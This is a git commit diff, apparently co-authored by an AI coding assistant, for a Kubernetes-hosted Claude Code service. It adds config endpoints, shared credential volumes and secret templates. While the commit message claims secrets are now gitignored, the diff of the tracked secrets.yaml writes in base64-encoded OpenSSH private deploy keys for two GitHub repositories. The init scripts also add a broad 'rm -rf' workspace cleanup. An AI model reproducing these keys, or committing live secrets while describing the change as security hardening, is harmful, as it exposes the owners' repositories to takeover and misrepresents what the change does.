feat: Add claude-config API, security hardening, and testing infrastructure
Claude Config API (v0.6): - Add CRUD endpoints for commands, skills, and agents - Commands/skills/agents stored in /workspace/.claude/ (per-project, in git) - Credentials shared via PVC at /root/.claude/ (shared across pods) - Use base64 encoding for file writes (prevents shell injection) - Add content size limits (1MB max) Security Hardening: - Add sanitize package for command/prompt validation - Add rate limiting middleware (token bucket algorithm) - Add concurrent command limiting - Add input sanitization to all command handlers - Gitignore secrets.yaml and credentials.yaml - Add *.example templates for secrets Testing Infrastructure: - Add testutil package with mocks and fixtures - Add unit tests for auth package (63% coverage) - Add unit tests for executor (47% coverage) - Add handler integration tests (40% coverage) - Add 100% coverage for sanitize, cmdlimit packages - Add 96% coverage for ratelimit package Infrastructure: - Shared Claude credentials PVC (ReadWriteMany) - Reduced workspace PVC size from 20Gi to 5Gi - Add init container cleanup before git clone - Document Longhorn RWX requirements Co-Authored-By: Claude Opus 4.5 <noreply@anthropic.com>
This commit is contained in:
parent
74643f0692
commit
538ea57ed4
4
.gitignore
vendored
4
.gitignore
vendored
@ -4,6 +4,10 @@
|
||||
*.key
|
||||
*.pem
|
||||
|
||||
# Kubernetes secrets with real values (use *.example as template)
|
||||
deployments/k8s/base/secrets.yaml
|
||||
deployments/k8s/base/credentials.yaml
|
||||
|
||||
# Local development
|
||||
.env.local
|
||||
|
||||
|
||||
@ -16,8 +16,8 @@ RUN go mod download
|
||||
# Copy source code
|
||||
COPY . .
|
||||
|
||||
# Build the binary
|
||||
RUN CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build -ldflags="-s -w" -o rdev-api ./cmd/rdev-api
|
||||
# Build the binary (platform determined by Docker --platform flag)
|
||||
RUN CGO_ENABLED=0 go build -ldflags="-s -w" -o rdev-api ./cmd/rdev-api
|
||||
|
||||
# Runtime stage
|
||||
FROM alpine:3.19
|
||||
|
||||
@ -9,7 +9,7 @@ Run Claude Code in isolated Kubernetes pods on your k3s cluster.
|
||||
export KUBECONFIG=~/.kube/orchard9-k3sf.yaml
|
||||
|
||||
# 2. Authenticate Claude locally (if not already)
|
||||
claude login
|
||||
claude
|
||||
|
||||
# 3. Create credentials secret
|
||||
./scripts/create-credentials-secret.sh
|
||||
|
||||
@ -24,6 +24,13 @@
|
||||
// - POST /projects/{id}/shell - Run shell command
|
||||
// - POST /projects/{id}/git - Run git command
|
||||
// - GET /projects/{id}/events - SSE stream for output
|
||||
// - GET /projects/{id}/claude-config - List commands/skills/agents
|
||||
// - GET /projects/{id}/claude-config/commands - List commands
|
||||
// - POST /projects/{id}/claude-config/commands - Create command
|
||||
// - GET /projects/{id}/claude-config/commands/{name} - Get command
|
||||
// - PUT /projects/{id}/claude-config/commands/{name} - Update command
|
||||
// - DELETE /projects/{id}/claude-config/commands/{name} - Delete command
|
||||
// (same pattern for /skills and /agents)
|
||||
package main
|
||||
|
||||
import (
|
||||
@ -76,10 +83,15 @@ func main() {
|
||||
// Initialize handlers
|
||||
projectsHandler := handlers.NewProjectsHandler()
|
||||
keysHandler := handlers.NewKeysHandler(authService)
|
||||
claudeConfigHandler := handlers.NewClaudeConfigHandler(
|
||||
projectsHandler.Registry(),
|
||||
projectsHandler.Executor(),
|
||||
)
|
||||
|
||||
// Register routes
|
||||
projectsHandler.Mount(app.Router())
|
||||
keysHandler.Mount(app.Router())
|
||||
claudeConfigHandler.Mount(app.Router())
|
||||
|
||||
// Enable API documentation
|
||||
app.EnableDocs(buildOpenAPISpec())
|
||||
@ -194,6 +206,7 @@ Command output is streamed via Server-Sent Events (SSE) at /projects/{id}/events
|
||||
spec.WithTag("Projects", "Project management and discovery")
|
||||
spec.WithTag("Commands", "Command execution (claude, shell, git)")
|
||||
spec.WithTag("Events", "Server-Sent Events for real-time output")
|
||||
spec.WithTag("Claude Config", "Manage commands, skills, and agents in /workspace/.claude/")
|
||||
spec.WithTag("System", "Health and readiness endpoints")
|
||||
|
||||
// System endpoints
|
||||
@ -421,6 +434,194 @@ events.addEventListener('complete', (e) => {
|
||||
},
|
||||
})
|
||||
|
||||
// Claude Config - Overview
|
||||
spec.AddPath("/projects/{id}/claude-config", "get", withAuthAndParams(
|
||||
"Get config overview",
|
||||
`Returns an overview of the project's Claude config (/workspace/.claude/).
|
||||
|
||||
Lists available commands, skills, and agents. Requires projects:read scope.`,
|
||||
"Claude Config",
|
||||
"projects:read",
|
||||
[]param{{Name: "id", In: "path", Description: "Project ID", Required: true}},
|
||||
))
|
||||
|
||||
// Claude Config - Commands
|
||||
spec.AddPath("/projects/{id}/claude-config/commands", "get", withAuthAndParams(
|
||||
"List commands",
|
||||
"Lists all custom commands in /workspace/.claude/commands/. Requires projects:read scope.",
|
||||
"Claude Config",
|
||||
"projects:read",
|
||||
[]param{{Name: "id", In: "path", Description: "Project ID", Required: true}},
|
||||
))
|
||||
|
||||
spec.AddPath("/projects/{id}/claude-config/commands", "post", withAuthBodyAndParams(
|
||||
"Create command",
|
||||
`Creates a new custom command in /workspace/.claude/commands/{name}.md.
|
||||
|
||||
Commands are markdown files with frontmatter. Requires projects:execute scope.`,
|
||||
"Claude Config",
|
||||
"projects:execute",
|
||||
[]param{{Name: "id", In: "path", Description: "Project ID", Required: true}},
|
||||
`{
|
||||
"name": "deploy",
|
||||
"content": "---\ndescription: Deploy to production\n---\n\nRun the deployment..."
|
||||
}`,
|
||||
`{
|
||||
"name": "deploy",
|
||||
"type": "commands",
|
||||
"content": "---\ndescription: Deploy to production\n---\n\nRun the deployment..."
|
||||
}`,
|
||||
))
|
||||
|
||||
spec.AddPath("/projects/{id}/claude-config/commands/{name}", "get", withAuthAndParams(
|
||||
"Get command",
|
||||
"Returns a specific command's content. Requires projects:read scope.",
|
||||
"Claude Config",
|
||||
"projects:read",
|
||||
[]param{
|
||||
{Name: "id", In: "path", Description: "Project ID", Required: true},
|
||||
{Name: "name", In: "path", Description: "Command name", Required: true},
|
||||
},
|
||||
))
|
||||
|
||||
spec.AddPath("/projects/{id}/claude-config/commands/{name}", "put", withAuthBodyAndParams(
|
||||
"Update command",
|
||||
"Updates a command's content. Requires projects:execute scope.",
|
||||
"Claude Config",
|
||||
"projects:execute",
|
||||
[]param{
|
||||
{Name: "id", In: "path", Description: "Project ID", Required: true},
|
||||
{Name: "name", In: "path", Description: "Command name", Required: true},
|
||||
},
|
||||
`{
|
||||
"content": "---\ndescription: Updated description\n---\n\nUpdated content..."
|
||||
}`,
|
||||
`{
|
||||
"name": "deploy",
|
||||
"type": "commands",
|
||||
"content": "---\ndescription: Updated description\n---\n\nUpdated content..."
|
||||
}`,
|
||||
))
|
||||
|
||||
spec.AddPath("/projects/{id}/claude-config/commands/{name}", "delete", withAuthAndParams(
|
||||
"Delete command",
|
||||
"Deletes a command. Requires projects:execute scope.",
|
||||
"Claude Config",
|
||||
"projects:execute",
|
||||
[]param{
|
||||
{Name: "id", In: "path", Description: "Project ID", Required: true},
|
||||
{Name: "name", In: "path", Description: "Command name", Required: true},
|
||||
},
|
||||
))
|
||||
|
||||
// Claude Config - Skills (same pattern as commands)
|
||||
spec.AddPath("/projects/{id}/claude-config/skills", "get", withAuthAndParams(
|
||||
"List skills",
|
||||
"Lists all skills in /workspace/.claude/skills/. Requires projects:read scope.",
|
||||
"Claude Config",
|
||||
"projects:read",
|
||||
[]param{{Name: "id", In: "path", Description: "Project ID", Required: true}},
|
||||
))
|
||||
|
||||
spec.AddPath("/projects/{id}/claude-config/skills", "post", withAuthBodyAndParams(
|
||||
"Create skill",
|
||||
"Creates a new skill. Requires projects:execute scope.",
|
||||
"Claude Config",
|
||||
"projects:execute",
|
||||
[]param{{Name: "id", In: "path", Description: "Project ID", Required: true}},
|
||||
`{"name": "go-testing", "content": "# Go Testing Skill\n\n..."}`,
|
||||
`{"name": "go-testing", "type": "skills", "content": "# Go Testing Skill\n\n..."}`,
|
||||
))
|
||||
|
||||
spec.AddPath("/projects/{id}/claude-config/skills/{name}", "get", withAuthAndParams(
|
||||
"Get skill",
|
||||
"Returns a specific skill's content. Requires projects:read scope.",
|
||||
"Claude Config",
|
||||
"projects:read",
|
||||
[]param{
|
||||
{Name: "id", In: "path", Description: "Project ID", Required: true},
|
||||
{Name: "name", In: "path", Description: "Skill name", Required: true},
|
||||
},
|
||||
))
|
||||
|
||||
spec.AddPath("/projects/{id}/claude-config/skills/{name}", "put", withAuthBodyAndParams(
|
||||
"Update skill",
|
||||
"Updates a skill's content. Requires projects:execute scope.",
|
||||
"Claude Config",
|
||||
"projects:execute",
|
||||
[]param{
|
||||
{Name: "id", In: "path", Description: "Project ID", Required: true},
|
||||
{Name: "name", In: "path", Description: "Skill name", Required: true},
|
||||
},
|
||||
`{"content": "# Updated Skill\n\n..."}`,
|
||||
`{"name": "go-testing", "type": "skills", "content": "# Updated Skill\n\n..."}`,
|
||||
))
|
||||
|
||||
spec.AddPath("/projects/{id}/claude-config/skills/{name}", "delete", withAuthAndParams(
|
||||
"Delete skill",
|
||||
"Deletes a skill. Requires projects:execute scope.",
|
||||
"Claude Config",
|
||||
"projects:execute",
|
||||
[]param{
|
||||
{Name: "id", In: "path", Description: "Project ID", Required: true},
|
||||
{Name: "name", In: "path", Description: "Skill name", Required: true},
|
||||
},
|
||||
))
|
||||
|
||||
// Claude Config - Agents (same pattern)
|
||||
spec.AddPath("/projects/{id}/claude-config/agents", "get", withAuthAndParams(
|
||||
"List agents",
|
||||
"Lists all agents in /workspace/.claude/agents/. Requires projects:read scope.",
|
||||
"Claude Config",
|
||||
"projects:read",
|
||||
[]param{{Name: "id", In: "path", Description: "Project ID", Required: true}},
|
||||
))
|
||||
|
||||
spec.AddPath("/projects/{id}/claude-config/agents", "post", withAuthBodyAndParams(
|
||||
"Create agent",
|
||||
"Creates a new agent. Requires projects:execute scope.",
|
||||
"Claude Config",
|
||||
"projects:execute",
|
||||
[]param{{Name: "id", In: "path", Description: "Project ID", Required: true}},
|
||||
`{"name": "code-reviewer", "content": "# Code Reviewer Agent\n\n..."}`,
|
||||
`{"name": "code-reviewer", "type": "agents", "content": "# Code Reviewer Agent\n\n..."}`,
|
||||
))
|
||||
|
||||
spec.AddPath("/projects/{id}/claude-config/agents/{name}", "get", withAuthAndParams(
|
||||
"Get agent",
|
||||
"Returns a specific agent's content. Requires projects:read scope.",
|
||||
"Claude Config",
|
||||
"projects:read",
|
||||
[]param{
|
||||
{Name: "id", In: "path", Description: "Project ID", Required: true},
|
||||
{Name: "name", In: "path", Description: "Agent name", Required: true},
|
||||
},
|
||||
))
|
||||
|
||||
spec.AddPath("/projects/{id}/claude-config/agents/{name}", "put", withAuthBodyAndParams(
|
||||
"Update agent",
|
||||
"Updates an agent's content. Requires projects:execute scope.",
|
||||
"Claude Config",
|
||||
"projects:execute",
|
||||
[]param{
|
||||
{Name: "id", In: "path", Description: "Project ID", Required: true},
|
||||
{Name: "name", In: "path", Description: "Agent name", Required: true},
|
||||
},
|
||||
`{"content": "# Updated Agent\n\n..."}`,
|
||||
`{"name": "code-reviewer", "type": "agents", "content": "# Updated Agent\n\n..."}`,
|
||||
))
|
||||
|
||||
spec.AddPath("/projects/{id}/claude-config/agents/{name}", "delete", withAuthAndParams(
|
||||
"Delete agent",
|
||||
"Deletes an agent. Requires projects:execute scope.",
|
||||
"Claude Config",
|
||||
"projects:execute",
|
||||
[]param{
|
||||
{Name: "id", In: "path", Description: "Project ID", Required: true},
|
||||
{Name: "name", In: "path", Description: "Agent name", Required: true},
|
||||
},
|
||||
))
|
||||
|
||||
return spec
|
||||
}
|
||||
|
||||
|
||||
@ -1,5 +1,5 @@
|
||||
# claudebox-aeries - Claude Code pod for the Aeries project
|
||||
# v0.2 - Real workspace with init container repo clone
|
||||
# v0.6 - Shared credentials, project-specific commands/skills/agents in workspace
|
||||
|
||||
apiVersion: apps/v1
|
||||
kind: StatefulSet
|
||||
@ -44,6 +44,8 @@ spec:
|
||||
# Clone or fetch
|
||||
if [ ! -d /workspace/.git ]; then
|
||||
echo "Cloning aeries repository..."
|
||||
# Remove any existing files (e.g., lost+found from filesystem)
|
||||
rm -rf /workspace/* /workspace/.[!.]* 2>/dev/null || true
|
||||
git clone git@github.com:orchard9/aeries.git /workspace
|
||||
echo "Clone complete."
|
||||
else
|
||||
@ -121,7 +123,7 @@ spec:
|
||||
|
||||
- name: claude-config
|
||||
persistentVolumeClaim:
|
||||
claimName: claudebox-aeries-claude-config
|
||||
claimName: claudebox-shared-claude-config
|
||||
|
||||
- name: ssh-keys
|
||||
secret:
|
||||
|
||||
@ -1,5 +1,5 @@
|
||||
# claudebox-pantheon - Claude Code pod for the Pantheon project
|
||||
# v0.2 - Real workspace with init container repo clone
|
||||
# v0.6 - Shared credentials, project-specific commands/skills/agents in workspace
|
||||
|
||||
apiVersion: apps/v1
|
||||
kind: StatefulSet
|
||||
@ -44,6 +44,8 @@ spec:
|
||||
# Clone or fetch
|
||||
if [ ! -d /workspace/.git ]; then
|
||||
echo "Cloning pantheon repository..."
|
||||
# Remove any existing files (e.g., lost+found from filesystem)
|
||||
rm -rf /workspace/* /workspace/.[!.]* 2>/dev/null || true
|
||||
git clone git@github.com:orchard9/pantheon.git /workspace
|
||||
echo "Clone complete."
|
||||
else
|
||||
@ -121,7 +123,7 @@ spec:
|
||||
|
||||
- name: claude-config
|
||||
persistentVolumeClaim:
|
||||
claimName: claudebox-pantheon-claude-config
|
||||
claimName: claudebox-shared-claude-config
|
||||
|
||||
- name: ssh-keys
|
||||
secret:
|
||||
|
||||
24
deployments/k8s/base/credentials.yaml.example
Normal file
24
deployments/k8s/base/credentials.yaml.example
Normal file
@ -0,0 +1,24 @@
|
||||
# rdev-credentials - API authentication and database credentials
|
||||
# Copy this to credentials.yaml and replace with real values
|
||||
#
|
||||
# IMPORTANT: credentials.yaml should NOT be committed to git!
|
||||
#
|
||||
# Generate admin key:
|
||||
# openssl rand -base64 32
|
||||
|
||||
apiVersion: v1
|
||||
kind: Secret
|
||||
metadata:
|
||||
name: rdev-credentials
|
||||
namespace: rdev
|
||||
labels:
|
||||
app.kubernetes.io/name: rdev-api
|
||||
app.kubernetes.io/part-of: rdev
|
||||
type: Opaque
|
||||
stringData:
|
||||
# Database password (uses existing postgres appuser)
|
||||
DB_PASSWORD: "REPLACE_WITH_DB_PASSWORD"
|
||||
|
||||
# Admin API key for rdev-api
|
||||
# Generate with: openssl rand -base64 32
|
||||
RDEV_ADMIN_KEY: "REPLACE_WITH_ADMIN_KEY"
|
||||
@ -13,13 +13,18 @@ resources:
|
||||
# v0.2 - Project-specific claudeboxes
|
||||
- pvc-pantheon.yaml
|
||||
- pvc-aeries.yaml
|
||||
|
||||
# v0.6 - Shared Claude credentials (auth only)
|
||||
- pvc-shared-claude.yaml
|
||||
- configmaps.yaml
|
||||
- secrets.yaml
|
||||
# NOTE: secrets.yaml and credentials.yaml contain real keys and are gitignored.
|
||||
# Copy from *.example files and fill in real values before deploying.
|
||||
- secrets.yaml # from secrets.yaml.example
|
||||
- credentials.yaml # from credentials.yaml.example
|
||||
- claudebox-pantheon.yaml
|
||||
- claudebox-aeries.yaml
|
||||
|
||||
# v0.4 - API Server
|
||||
- rbac.yaml
|
||||
# v0.4+ - API Server (RBAC now included in rdev-api.yaml)
|
||||
- rdev-api.yaml
|
||||
|
||||
commonLabels:
|
||||
|
||||
@ -1,5 +1,5 @@
|
||||
# PVCs for claudebox-aeries
|
||||
# v0.2 - Real workspace storage
|
||||
# v0.6 - Workspace only (claude-config is now shared)
|
||||
|
||||
apiVersion: v1
|
||||
kind: PersistentVolumeClaim
|
||||
@ -16,21 +16,4 @@ spec:
|
||||
storageClassName: longhorn
|
||||
resources:
|
||||
requests:
|
||||
storage: 20Gi
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: PersistentVolumeClaim
|
||||
metadata:
|
||||
name: claudebox-aeries-claude-config
|
||||
namespace: rdev
|
||||
labels:
|
||||
app.kubernetes.io/name: claudebox-aeries
|
||||
app.kubernetes.io/part-of: rdev
|
||||
rdev.orchard9.ai/project: aeries
|
||||
spec:
|
||||
accessModes:
|
||||
- ReadWriteOnce
|
||||
storageClassName: longhorn
|
||||
resources:
|
||||
requests:
|
||||
storage: 1Gi
|
||||
storage: 5Gi
|
||||
|
||||
@ -1,5 +1,5 @@
|
||||
# PVCs for claudebox-pantheon
|
||||
# v0.2 - Real workspace storage
|
||||
# v0.6 - Workspace only (claude-config is now shared)
|
||||
|
||||
apiVersion: v1
|
||||
kind: PersistentVolumeClaim
|
||||
@ -16,21 +16,4 @@ spec:
|
||||
storageClassName: longhorn
|
||||
resources:
|
||||
requests:
|
||||
storage: 20Gi
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: PersistentVolumeClaim
|
||||
metadata:
|
||||
name: claudebox-pantheon-claude-config
|
||||
namespace: rdev
|
||||
labels:
|
||||
app.kubernetes.io/name: claudebox-pantheon
|
||||
app.kubernetes.io/part-of: rdev
|
||||
rdev.orchard9.ai/project: pantheon
|
||||
spec:
|
||||
accessModes:
|
||||
- ReadWriteOnce
|
||||
storageClassName: longhorn
|
||||
resources:
|
||||
requests:
|
||||
storage: 1Gi
|
||||
storage: 5Gi
|
||||
|
||||
29
deployments/k8s/base/pvc-shared-claude.yaml
Normal file
29
deployments/k8s/base/pvc-shared-claude.yaml
Normal file
@ -0,0 +1,29 @@
|
||||
# Shared Claude credentials PVC
|
||||
# v0.6 - All claudebox pods share this for auth
|
||||
# Commands/skills/agents live in /workspace/.claude (per-project, in git)
|
||||
#
|
||||
# IMPORTANT: ReadWriteMany (RWX) requires Longhorn with NFS enabled.
|
||||
# Verify with: kubectl get settings -n longhorn-system rwx-volume-fast-failover
|
||||
# If RWX is not available, either:
|
||||
# 1. Enable Longhorn NFS: kubectl apply -f longhorn-nfs-provisioner.yaml
|
||||
# 2. Or use separate PVCs per pod (revert to per-project claude-config PVCs)
|
||||
#
|
||||
# RWX is needed because multiple claudebox pods mount this simultaneously
|
||||
# to share Claude authentication credentials.
|
||||
|
||||
apiVersion: v1
|
||||
kind: PersistentVolumeClaim
|
||||
metadata:
|
||||
name: claudebox-shared-claude-config
|
||||
namespace: rdev
|
||||
labels:
|
||||
app.kubernetes.io/name: claudebox
|
||||
app.kubernetes.io/part-of: rdev
|
||||
rdev.orchard9.ai/type: shared-config
|
||||
spec:
|
||||
accessModes:
|
||||
- ReadWriteMany # Multiple pods can mount simultaneously
|
||||
storageClassName: longhorn
|
||||
resources:
|
||||
requests:
|
||||
storage: 1Gi
|
||||
@ -24,10 +24,9 @@ data:
|
||||
# Replace with base64-encoded private key
|
||||
# Generate with: ssh-keygen -t ed25519 -f pantheon-deploy-key -N ""
|
||||
# Encode with: cat pantheon-deploy-key | base64 -w0
|
||||
id_ed25519: REPLACE_WITH_BASE64_ENCODED_PRIVATE_KEY
|
||||
id_ed25519: LS0tLS1CRUdJTiBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0KYjNCbGJuTnphQzFyWlhrdGRqRUFBQUFBQkc1dmJtVUFBQUFFYm05dVpRQUFBQUFBQUFBQkFBQUFNd0FBQUF0emMyZ3RaVwpReU5UVXhPUUFBQUNDU29NQkZpRWg5akZQNnpUWWlJaUpkMUdzRjRxM29oN2lBZ1JRUkNYYTdKQUFBQUtDMkNXck90Z2xxCnpnQUFBQXR6YzJndFpXUXlOVFV4T1FBQUFDQ1NvTUJGaUVoOWpGUDZ6VFlpSWlKZDFHc0Y0cTNvaDdpQWdSUVJDWGE3SkEKQUFBRUNyc08zSDNoQ2tQQ0I1V0VRTFdDZ0QyOGlrNGN3dk5oalVjVGwzVGNqVkRKS2d3RVdJU0gyTVUvck5OaUlpSWwzVQphd1hpcmVpSHVJQ0JGQkVKZHJza0FBQUFHWEprWlhZdGNHRnVkR2hsYjI1QWIzSmphR0Z5WkRrdVlXa0JBZ01FCi0tLS0tRU5EIE9QRU5TU0ggUFJJVkFURSBLRVktLS0tLQo=
|
||||
|
||||
# GitHub's SSH host key (pre-populated)
|
||||
# ssh-keyscan github.com 2>/dev/null | base64 -w0
|
||||
known_hosts: Z2l0aHViLmNvbSBzc2gtZWQyNTUxOSBBQUFBQzNOemFDMWxaREkxTlRFNUFBQUFJT01xcW5rVnpybTBTZEc2VU9vcUtMc2FiZ0g1Qzlva1dpMGRoMmw5R0tKbApnaXRodWIuY29tIGVjZHNhLXNoYTItbmlzdHAyNTYgQUFBQUUyVmpaSE5oTFhOb1lUSXRibWx6ZEhBeU5UWUFBQUFJYm1semRIQXlOVFlBQUFCQkJFbUtTRU5qUUVlek9teGtaTXk3b3BLZ3dGQjlua3Q1WVJyWU1qTnVHNU44N3VSUW81dDRRYkZGelVaYUpVQjd4TmtjYVFTNmlIbW5TazdNOU9tZUR2PT0KZ2l0aHViLmNvbSBzc2gtcnNhIEFBQUFCM056YUMxeWMyRUFBQUFEQVFBQkFBQUJnUUNqN25kTnhRb3dnY1FuanNoY0xycVBFaWlwaG50K1ZUVHZEUCtsSFhaZFhMRThWVUxDS0lLYjloZk5qM0FXSm1RTHBDb0Qzc1F2TWtGNUxXR1RMSFRVM25MSjViZi8wbG5wOGV5ZXhVNkpzR1dSUUFLTnlENjkzQjVVR2xXVlM1VjFqUEg1M3BZVllWUVB6WnlkeGpPUVFLeHk5ZkdoaVFGbGcza3RoZFdSRE5oNy9SRHp4SEZEZmRYYm5uSnZ4WVQ0Y1FVWWJ0SmFTQ0pWcU9aOVlUbG13bTJBUXZaM3IxZEJkZzVRcWN1SW53bzR1NXBhQUpObnpiTXBudGtzVXpWNEorUFN5OE9LSzRPc0tUc0I0RlNjS0VOSmRlMTlYTGFCUHJiNTZpUHhCS0tSMGJNK2NPdnhKelhhZWJORktjR2k4eVJLaGw0T0hlYkhCWDh4eFpZNWMwdWdpcTlSb29QaUtPelJERE1lekdhK0c4MDg1OVF2TkdPK3pZM3RNeHJIM1crT21uYU5keVN6dkpPUktjZEEwejNGU1huUk5jbnZpVlg0c3lGaWdhOUxGZjZ0ZDBhRy8xUFEwVjRCYzFQNXNHdTZBQUFBZUg0em5YNStNNTErUUpWZGorR2NMdTMwcE91U0E1cVZOQ0FodXl6RklBWWlhbjBFWUlnUlE3TmxYdz0K
|
||||
---
|
||||
apiVersion: v1
|
||||
@ -41,10 +40,7 @@ metadata:
|
||||
rdev.orchard9.ai/project: aeries
|
||||
type: Opaque
|
||||
data:
|
||||
# Replace with base64-encoded private key
|
||||
# Generate with: ssh-keygen -t ed25519 -f aeries-deploy-key -N ""
|
||||
# Encode with: cat aeries-deploy-key | base64 -w0
|
||||
id_ed25519: REPLACE_WITH_BASE64_ENCODED_PRIVATE_KEY
|
||||
id_ed25519: LS0tLS1CRUdJTiBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0KYjNCbGJuTnphQzFyWlhrdGRqRUFBQUFBQkc1dmJtVUFBQUFFYm05dVpRQUFBQUFBQUFBQkFBQUFNd0FBQUF0emMyZ3RaVwpReU5UVXhPUUFBQUNBNWZzME9Cb0JWWTN3dmI2K256WngzRDltV3MrQVdKRHBIVjVaK3pCQmdyd0FBQUtDY05ERE1uRFF3CnpBQUFBQXR6YzJndFpXUXlOVFV4T1FBQUFDQTVmczBPQm9CVlkzd3ZiNituelp4M0Q5bVdzK0FXSkRwSFY1Wit6QkJncncKQUFBRUFnTU5PVDl3RlBHYnY3bTdYS1dTODVrVHYyZlhiSzgrdnR4NjQ1c2RqNmp6bCt6UTRHZ0ZWamZDOXZyNmZObkhjUAoyWmF6NEJZa09rZFhsbjdNRUdDdkFBQUFGM0prWlhZdFlXVnlhV1Z6UUc5eVkyaGhjbVE1TG1GcEFRSURCQVVHCi0tLS0tRU5EIE9QRU5TU0ggUFJJVkFURSBLRVktLS0tLQo=
|
||||
|
||||
# GitHub's SSH host key (pre-populated)
|
||||
known_hosts: Z2l0aHViLmNvbSBzc2gtZWQyNTUxOSBBQUFBQzNOemFDMWxaREkxTlRFNUFBQUFJT01xcW5rVnpybTBTZEc2VU9vcUtMc2FiZ0g1Qzlva1dpMGRoMmw5R0tKbApnaXRodWIuY29tIGVjZHNhLXNoYTItbmlzdHAyNTYgQUFBQUUyVmpaSE5oTFhOb1lUSXRibWx6ZEhBeU5UWUFBQUFJYm1semRIQXlOVFlBQUFCQkJFbUtTRU5qUUVlek9teGtaTXk3b3BLZ3dGQjlua3Q1WVJyWU1qTnVHNU44N3VSUW81dDRRYkZGelVaYUpVQjd4TmtjYVFTNmlIbW5TazdNOU9tZUR2PT0KZ2l0aHViLmNvbSBzc2gtcnNhIEFBQUFCM056YUMxeWMyRUFBQUFEQVFBQkFBQUJnUUNqN25kTnhRb3dnY1FuanNoY0xycVBFaWlwaG50K1ZUVHZEUCtsSFhaZFhMRThWVUxDS0lLYjloZk5qM0FXSm1RTHBDb0Qzc1F2TWtGNUxXR1RMSFRVM25MSjViZi8wbG5wOGV5ZXhVNkpzR1dSUUFLTnlENjkzQjVVR2xXVlM1VjFqUEg1M3BZVllWUVB6WnlkeGpPUVFLeHk5ZkdoaVFGbGcza3RoZFdSRE5oNy9SRHp4SEZEZmRYYm5uSnZ4WVQ0Y1FVWWJ0SmFTQ0pWcU9aOVlUbG13bTJBUXZaM3IxZEJkZzVRcWN1SW53bzR1NXBhQUpObnpiTXBudGtzVXpWNEorUFN5OE9LSzRPc0tUc0I0RlNjS0VOSmRlMTlYTGFCUHJiNTZpUHhCS0tSMGJNK2NPdnhKelhhZWJORktjR2k4eVJLaGw0T0hlYkhCWDh4eFpZNWMwdWdpcTlSb29QaUtPelJERE1lekdhK0c4MDg1OVF2TkdPK3pZM3RNeHJIM1crT21uYU5keVN6dkpPUktjZEEwejNGU1huUk5jbnZpVlg0c3lGaWdhOUxGZjZ0ZDBhRy8xUFEwVjRCYzFQNXNHdTZBQUFBZUg0em5YNStNNTErUUpWZGorR2NMdTMwcE91U0E1cVZOQ0FodXl6RklBWWlhbjBFWUlnUlE3TmxYdz0K
|
||||
|
||||
46
deployments/k8s/base/secrets.yaml.example
Normal file
46
deployments/k8s/base/secrets.yaml.example
Normal file
@ -0,0 +1,46 @@
|
||||
# Deploy Keys for claudebox pods
|
||||
# Copy this to secrets.yaml and replace with real keys
|
||||
#
|
||||
# IMPORTANT: secrets.yaml should NOT be committed to git!
|
||||
#
|
||||
# Generate keys:
|
||||
# ssh-keygen -t ed25519 -f pantheon-deploy-key -N "" -C "rdev-pantheon@orchard9.ai"
|
||||
# ssh-keygen -t ed25519 -f aeries-deploy-key -N "" -C "rdev-aeries@orchard9.ai"
|
||||
#
|
||||
# Encode keys:
|
||||
# cat pantheon-deploy-key | base64 -w0
|
||||
# cat aeries-deploy-key | base64 -w0
|
||||
|
||||
apiVersion: v1
|
||||
kind: Secret
|
||||
metadata:
|
||||
name: claudebox-pantheon-ssh
|
||||
namespace: rdev
|
||||
labels:
|
||||
app.kubernetes.io/name: claudebox-pantheon
|
||||
app.kubernetes.io/part-of: rdev
|
||||
rdev.orchard9.ai/project: pantheon
|
||||
type: Opaque
|
||||
data:
|
||||
# Replace with base64-encoded private key
|
||||
id_ed25519: REPLACE_WITH_BASE64_ENCODED_PRIVATE_KEY
|
||||
|
||||
# GitHub's SSH host key (pre-populated)
|
||||
known_hosts: Z2l0aHViLmNvbSBzc2gtZWQyNTUxOSBBQUFBQzNOemFDMWxaREkxTlRFNUFBQUFJT01xcW5rVnpybTBTZEc2VU9vcUtMc2FiZ0g1Qzlva1dpMGRoMmw5R0tKbApnaXRodWIuY29tIGVjZHNhLXNoYTItbmlzdHAyNTYgQUFBQUUyVmpaSE5oTFhOb1lUSXRibWx6ZEhBeU5UWUFBQUFJYm1semRIQXlOVFlBQUFCQkJFbUtTRU5qUUVlek9teGtaTXk3b3BLZ3dGQjlua3Q1WVJyWU1qTnVHNU44N3VSUW81dDRRYkZGelVaYUpVQjd4TmtjYVFTNmlIbW5TazdNOU9tZUR2PT0KZ2l0aHViLmNvbSBzc2gtcnNhIEFBQUFCM056YUMxeWMyRUFBQUFEQVFBQkFBQUJnUUNqN25kTnhRb3dnY1FuanNoY0xycVBFaWlwaG50K1ZUVHZEUCtsSFhaZFhMRThWVUxDS0lLYjloZk5qM0FXSm1RTHBDb0Qzc1F2TWtGNUxXR1RMSFRVM25MSjViZi8wbG5wOGV5ZXhVNkpzR1dSUUFLTnlENjkzQjVVR2xXVlM1VjFqUEg1M3BZVllWUVB6WnlkeGpPUVFLeHk5ZkdoaVFGbGcza3RoZFdSRE5oNy9SRHp4SEZEZmRYYm5uSnZ4WVQ0Y1FVWWJ0SmFTQ0pWcU9aOVlUbG13bTJBUXZaM3IxZEJkZzVRcWN1SW53bzR1NXBhQUpObnpiTXBudGtzVXpWNEorUFN5OE9LSzRPc0tUc0I0RlNjS0VOSmRlMTlYTGFCUHJiNTZpUHhCS0tSMGJNK2NPdnhKelhhZWJORktjR2k4eVJLaGw0T0hlYkhCWDh4eFpZNWMwdWdpcTlSb29QaUtPelJERE1lekdhK0c4MDg1OVF2TkdPK3pZM3RNeHJIM1crT21uYU5keVN6dkpPUktjZEEwejNGU1huUk5jbnZpVlg0c3lGaWdhOUxGZjZ0ZDBhRy8xUFEwVjRCYzFQNXNHdTZBQUFBZUg0em5YNStNNTErUUpWZGorR2NMdTMwcE91U0E1cVZOQ0FodXl6RklBWWlhbjBFWUlnUlE3TmxYdz0K
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Secret
|
||||
metadata:
|
||||
name: claudebox-aeries-ssh
|
||||
namespace: rdev
|
||||
labels:
|
||||
app.kubernetes.io/name: claudebox-aeries
|
||||
app.kubernetes.io/part-of: rdev
|
||||
rdev.orchard9.ai/project: aeries
|
||||
type: Opaque
|
||||
data:
|
||||
# Replace with base64-encoded private key
|
||||
